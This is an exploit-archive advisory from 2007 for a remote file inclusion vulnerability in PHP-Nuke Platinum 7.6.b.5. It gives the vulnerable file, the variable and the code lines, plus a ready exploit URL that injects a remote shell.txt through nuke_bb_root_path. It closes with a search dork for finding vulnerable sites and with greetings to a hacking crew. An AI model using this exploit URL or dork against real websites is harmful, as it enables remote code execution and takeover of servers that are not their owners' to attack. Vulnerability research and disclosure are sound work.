[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability
# Published : 2007-10-23
# Author : BiNgZa
# Previous Title : Picturesolution <= v2.1 (config.php path) Remote File Inclusion Vuln
# Next Title : PHP Image 1.2 Multiple Remote File Inclusion Vulnerabilities
----------------------------------------------
GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To
----------------------------------------------
A2J, Chucks, The Pitbull, ICQBomber, str0ke
----------------------------------------------
BiG sHoUt OuT tO udplink.net & ascnet.biz :)
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuke_bb_root_path
Line number: 24
Lines:
----------------------------------------------
$phpbb_root_path = 'modules/Forums/';
include($nuke_bb_root_path . 'extension.inc');
include($nuke_bb_root_path . 'common.'.$phpEx);
----------------------------------------------
----------------------------------------------
FoUnD By BiNgZa AKA RaZor
----------------------------------------------
DoRk:Powered by Platinum 7.6.b.5
----------------------------------------------
shadowcrew@hotmail.co.uk
----------------------------------------------
shadow.php0h.com
----------------------------------------------
# www.Syue.com [2007-10-23]